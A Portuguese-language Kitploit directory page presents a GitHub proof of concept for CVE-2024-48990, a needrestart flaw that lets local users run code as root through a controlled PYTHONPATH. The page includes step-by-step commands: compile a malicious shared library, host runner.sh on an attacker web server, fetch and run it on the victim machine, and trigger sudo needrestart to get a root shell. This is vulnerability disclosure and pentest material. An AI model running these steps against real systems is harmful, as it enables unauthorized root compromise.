Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-48990 — PoC sobre CVE-2024-48990. A Qualys descobriu que o needrestart, antes da versão 3.8, permite que atacantes locais executem código arbitrário como root, enganando o needrestart para executar o interpretador Python com uma variável de ambiente PYTHONPATH controlada pelo atacante. (NIST) | Kitploit
Ferramentas/GitHubGitHub/grecosamuel/cve-2024-48990
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e Educação
GitHubgrecosamuel/cve-2024-48990

CVE-2024-48990

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

PoC sobre CVE-2024-48990. A Qualys descobriu que o needrestart, antes da versão 3.8, permite que atacantes locais executem código arbitrário como root, enganando o needrestart para executar o interpretador Python com uma variável de ambiente PYTHONPATH controlada pelo atacante. (NIST)

Compartilhar
1há 9 mesesAinda não revisado

CVE-2024-48990

[!WARNING] Estes arquivos e informações são destinados apenas para fins educacionais. O autor não é responsável por qualquer comportamento malicioso. Todas as informações fornecidas não têm a intenção de incitar qualquer tipo de crime ou abuso.

Descrição

A Qualys descobriu que o needrestart, antes da versão 3.8, permite que invasores locais executem código arbitrário como root, enganando o needrestart para executar o interpretador Python com uma variável de ambiente PYTHONPATH controlada pelo invasor. Consulte o NIST para obter detalhes oficiais.

PoC

  1. Baixe o repositório do git

git clone https://github.com/grecosamuel/CVE-2024-48990.git

  1. Compile a biblioteca exploit.c para gerar uma biblioteca ELF válida e nomeie-a como __init__.so

gcc -shared -fPIC -o __init__.so exploit.c

  1. Altere <IP> e <PORT> no runner.sh, linhas 7 e 10, com seu IP e PORTA do seu próprio servidor web.
  2. Inicie o servidor web

python3 -m http.server

  1. Baixe o runner na máquina da vítima

wget http://IP:PORT/runner.sh

  1. Defina permissão de execução para o runner

chmod +x runner.sh

  1. Execute o script

./runner.sh

  1. Execute o needrestart com permissão sudo

sudo needrestart

Quando ler [*] CVE module created pressione CTRL+C para parar o processo e obter seu shell!

Baixar ferramenta